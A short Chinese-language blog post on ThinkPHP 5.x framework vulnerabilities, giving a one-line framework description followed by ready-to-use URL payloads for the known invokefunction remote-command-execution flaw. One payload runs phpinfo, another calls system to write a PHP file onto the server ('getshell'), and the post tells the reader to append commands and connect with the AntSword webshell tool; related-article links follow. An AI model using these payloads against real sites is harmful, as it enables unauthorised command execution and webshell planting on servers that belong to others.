常见框架漏洞:Thinkphp(TP)篇

与神明画鸭2025-03-26 7:04

简介

ThinkPHP (简称 TP )是一款流行的 国产开源 PHP 框架 ,遵循 MVC(Model-View-Controller) 设计模式,以简洁、高效、灵活著称,广泛应用于国内中小型 Web 项目开发。

Thinkphp5x远程命令执行及getshell

原理

rce

过程

打开网站

复制代码 
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

在后面拼接指令即可

getshell

复制代码 
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php

访问后使用蚁剑链接即可

相关推荐
非凡的世界3 天前
Thinkphp8 Redis队列与消息队列topthink/think-queue 原创
数据库·redis·bootstrap·thinkphp
非凡的世界4 天前
ThinkPHP8集成RabbitMQ的完整案例实现 原创
rabbitmq·thinkphp
未来之窗软件服务5 天前
UI设计(三)按实际输出内容递增的序号效果——东方仙盟筑基期
ui·thinkphp·仙盟创梦ide·东方仙盟sdk
奔跑吧邓邓子12 天前
【C++实战(75)】筑牢安全防线,攻克漏洞难题
c++·安全·实战·漏洞
黑客思维者15 天前
Notepad++中高危DLL劫持漏洞深度剖析
notepad++·漏洞·dll劫持
王嘉俊92518 天前
ThinkPHP 入门:快速构建 PHP Web 应用的强大框架
开发语言·前端·后端·php·框架·thinkphp
李白你好1 个月前
CVE-2025-2502 / CNVD-2025-16450 联想电脑管家权限提升漏洞
漏洞
网络研究院2 个月前
Citrix 零日漏洞自五月起遭积极利用
网络·安全·漏洞·威胁
蓝黑20202 个月前
阿里云ECS服务器搭建ThinkPHP环境
服务器·阿里云·thinkphp
网络研究院2 个月前
新的 SHAMOS MacOS 窃取程序利用单行终端命令攻击用户
macos·攻击·漏洞·用户
热门推荐
01BongoCat - 跨平台键盘猫动画工具02GitHub 镜像站点03两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答04UV安装并设置国内源05Linux下V2Ray安装配置指南06KGG转MP3工具|非KGM文件|解密音频07GitLab 零基础入门指南:从安装到项目管理全流程08windows找不到gpedit.msc(本地组策略编辑器)09在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)1046个Nano-banana 精选提示词,持续更新中